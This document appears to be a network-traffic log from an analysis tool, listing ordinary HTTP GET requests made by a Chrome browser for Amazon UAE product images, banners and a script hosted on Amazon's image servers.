Source: global trafficHTTP traffic detected: GET /images/I/61r-8obHj2L._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61nBo0wifmL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2020/img/Apparel/XCM_Manual_1224505_1174644_UAE_3096775_153x125_2X_en_AE._SY116_CB431807455_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2020/img/Apparel/XCM_CUTTLE_1230335_1213334_UAE_3151164_153x125_en_AE._SY116_CB428587698_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1717422_3765620_758x608_2X_en_AE._SY304_CB558443037_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/electronics/store/kamja/WebQC/2021/Wearables/Feb_Smartwatch_1x._SY116_CB659039825_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/619pZrUnkWL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/81-cKwx9+lL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/618LrXHTM3L._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/71VOSLOz4+L._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61hmx6dffrL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61f7uyPypDL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/71qrtZlAzuL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61r-8obHj2L._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/electronics/store/kamja/WebQC/2021/Wearables/Feb_Fitness_1x._SY116_CB659039825_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/electronics/store/kamja/WebQC/2021/Wearables/Feb_Premium_1x._SY116_CB659039825_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/electronics/store/kamja/WebQC/2021/Wearables/Feb_Under199_1x._SY116_CB659039825_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/ohl/xmsridha/toys_bau_qc_2322/xcm_banners_dqc-summer-outdoor-play_372x232_ae-en._SY116_CB622964834_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/6112GiUzrdL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/71KMAIXQSwL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/811MBu6BRlL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/619pZrUnkWL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/81KPTvbMOYL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/ohl/xmsridha/toys_bau_qc_2322/xcm_banners_toys-bau-qc-2322-372x232-b08fxs6285_372x232_ae-en._SY116_CB627396615_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/ohl/xmsridha/toys_bau_qc_2322/xcm_banners_toys-bau-qc-2322-372x232-b07nbr59qv_372x232_ae-en._SY116_CB627396612_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/ohl/xmsridha/toys_bau_qc_2322/xcm_banners_toys-bau-qc-2322-372x232-b09rpsq7r3_372x232_ae-en._SY116_CB627396617_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/71VOSLOz4+L._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259740_400x400_2X._CB617696541_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61hmx6dffrL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/51+h1QnUXbL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/61OdLUpG-FL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/6112GiUzrdL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259756_400x400_2X._CB617696541_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259749_400x400_2X._CB617696541_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/71KMAIXQSwL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/811MBu6BRlL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259758_400x400_2X._CB617696541_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259737_400x400_2X._CB617696541_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259751_400x400_2X._CB617696541_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259736_400x400_2X._CB617696541_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/71Ii794TdiL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/81KPTvbMOYL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/I/01rGP6HIADL.js?AUIClients/GenericObservableJS HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.amazon.aesec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
